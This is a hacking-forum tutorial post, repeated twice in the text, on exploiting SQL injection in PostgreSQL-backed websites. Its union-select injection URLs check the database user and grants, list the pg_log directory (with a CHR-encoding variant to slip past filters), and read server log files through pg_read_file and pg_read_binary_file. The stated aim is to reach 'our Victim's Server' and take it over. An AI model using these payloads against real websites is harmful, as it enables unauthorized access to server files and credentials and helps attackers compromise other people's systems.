Void
03-11-2015, 07:06 PM
Hey everyone,
So I guess it's time to learn something juicy about Postgresql.
If you're injecting a Website based on a Postgresql database then you might wanna check your privileges because this will simply allow you to use lots of interesting Postgresql Functions in case you could:
You can find most of these functions in here:
http://www.postgresql.org/docs/9.4/static/functions-admin.html
What we will be covering in this Tutorial is related to reading Log Files. The Log Files contain everything related to the Postgresql Database running on our Victim's Server and we all know that Log Files holds really interesting information that may allow us to take over the whole server easily, so lets just get started.
Vulnerable Link:
http://127.0.0.1/search.php?name=username
Checking if we have Privileges:
There's two thing we have to do to see if we have privileges or not.
Firstly, we have to get the Current User and Secondly, we will check if this user has the right privileges.
http://127.0.0.1/search.php?name=username union select current_user
Output: postgres
TIP: In my case there's only one column in the default table.
http://127.0.0.1/search.php?name=username union select is_grantable from information_schema.role_table_grants where grantee='postgres'
You can check and select what you want from these tables but in my case I am going to be using admin functions related to "pg_read_file" and many others so I'm gonna have to use role_table_grants because with it I can check if my user has privileges to using those functions.
http://127.0.0.1/search.php?name=username union select is_grantable from information_schema.role_table_grants where grantee='postgres'
Output: YES
Loading Directory Files:
Now that we know that we have privileges, we're going to check the names of the files in the Log Folder before we start reading them.
The functions that we are going to be using can be found here:
http://www.postgresql.org/docs/9.4/static/functions-admin.html#FUNCTIONS-ADMIN-GENFILE-TABLE
Those functions only allow us to do whatever we want with everything found in the "data" directory that can be found in the Postgresql Installation Directory:
Now in our case we will only be reading files inside the "pg_log" directory. You can obviously check any other directory though.
http://127.0.0.1/search.php?name=username union select pg_ls_dir('pg_log')
If the above link didn't work then you can try the HEX or the CHAR value of "pg_log" instead of the plain one:
Code:
http://127.0.0.1/search.php?name=username union select pg_ls_dir( CHR(112) || CHR(103) || CHR(95) || CHR(108) || CHR(111) || CHR(103))
etc...
Reading Log Files:
There's many functions we can use to read a file:
pg_read_file()
pg_read_binary_file()
etc...
Using "pg_read_file":
http://127.0.0.1/search.php?name=username union select pg_read_file('pg_log\postgresql-2014-05-07_210124.log')
This will simply read the file and show its text on the page.
Using "pg_read_binary_file":
http://127.0.0.1/search.php?name=username union select cast(pg_read_binary_file('pg_log\postgresql-2014-05-07_210124.log') as varchar)
Before I explain this I would like to point that we used pg_read_binary_file which returns an unreadable value that, obviously, can't be shown on the webpage unless you use something similar to the "Cast" Function which will show the text of the file as you wish. (In my case as a "varchar"; showing a HEX value)
Now this is better than reading the file using pg_read_file because you can simply Decode the HEX value and get the exact layout of the Log file.
So I guess it's time to learn something juicy about Postgresql.
If you're injecting a Website based on a Postgresql database then you might wanna check your privileges because this will simply allow you to use lots of interesting Postgresql Functions in case you could:
You can find most of these functions in here:
http://www.postgresql.org/docs/9.4/static/functions-admin.html
What we will be covering in this Tutorial is related to reading Log Files. The Log Files contain everything related to the Postgresql Database running on our Victim's Server and we all know that Log Files holds really interesting information that may allow us to take over the whole server easily, so lets just get started.
Vulnerable Link:
http://127.0.0.1/search.php?name=username
Checking if we have Privileges:
There's two thing we have to do to see if we have privileges or not.
Firstly, we have to get the Current User and Secondly, we will check if this user has the right privileges.
http://127.0.0.1/search.php?name=username union select current_user
Output: postgres
TIP: In my case there's only one column in the default table.
http://127.0.0.1/search.php?name=username union select is_grantable from information_schema.role_table_grants where grantee='postgres'
You can check and select what you want from these tables but in my case I am going to be using admin functions related to "pg_read_file" and many others so I'm gonna have to use role_table_grants because with it I can check if my user has privileges to using those functions.
http://127.0.0.1/search.php?name=username union select is_grantable from information_schema.role_table_grants where grantee='postgres'
Output: YES
Loading Directory Files:
Now that we know that we have privileges, we're going to check the names of the files in the Log Folder before we start reading them.
The functions that we are going to be using can be found here:
http://www.postgresql.org/docs/9.4/static/functions-admin.html#FUNCTIONS-ADMIN-GENFILE-TABLE
Those functions only allow us to do whatever we want with everything found in the "data" directory that can be found in the Postgresql Installation Directory:
Now in our case we will only be reading files inside the "pg_log" directory. You can obviously check any other directory though.
http://127.0.0.1/search.php?name=username union select pg_ls_dir('pg_log')
If the above link didn't work then you can try the HEX or the CHAR value of "pg_log" instead of the plain one:
Code:
http://127.0.0.1/search.php?name=username union select pg_ls_dir( CHR(112) || CHR(103) || CHR(95) || CHR(108) || CHR(111) || CHR(103))
etc...
Reading Log Files:
There's many functions we can use to read a file:
pg_read_file()
pg_read_binary_file()
etc...
Using "pg_read_file":
http://127.0.0.1/search.php?name=username union select pg_read_file('pg_log\postgresql-2014-05-07_210124.log')
This will simply read the file and show its text on the page.
Using "pg_read_binary_file":
http://127.0.0.1/search.php?name=username union select cast(pg_read_binary_file('pg_log\postgresql-2014-05-07_210124.log') as varchar)
Before I explain this I would like to point that we used pg_read_binary_file which returns an unreadable value that, obviously, can't be shown on the webpage unless you use something similar to the "Cast" Function which will show the text of the file as you wish. (In my case as a "varchar"; showing a HEX value)
Now this is better than reading the file using pg_read_file because you can simply Decode the HEX value and get the exact layout of the Log file.